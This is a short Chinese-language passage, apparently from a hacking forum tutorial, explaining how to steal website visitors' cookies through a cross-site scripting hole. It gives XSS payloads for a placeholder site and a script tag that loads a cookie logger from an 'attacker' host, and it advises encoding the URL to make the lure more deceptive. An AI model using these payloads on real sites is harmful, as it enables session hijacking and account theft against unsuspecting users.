对 log.php? 之后的部分进行加密或者编码以使其他人不去注意，增大欺骗性。

如果你基本不懂javascript，你也可以使用通过使用 log.js file 来自动窃取cookies.

你只需使用 <script src="http://attacker/logger/log.js></script>标签，你将替换你的主机为目标主机。

示例:
如果你在某个网站发现了一个 Xss漏洞, 那么

x.com/x.php?x=<script>alert(’xss’)<script>

或者

x.com/x.php?x="><script>alert(’xss’)</script>

你只需替换script后面的部分

比如

<script src="http://attacker/logger/log.js">

然后它将重定向用户到你的logger,

你可以根据你的需要选择你认为容易的方法.

x就是可能存在跨站脚本漏洞的站点。

现在它将在客户端自动执行 js ，而你将获得受害者的 Cookies

来源于天阳技术联盟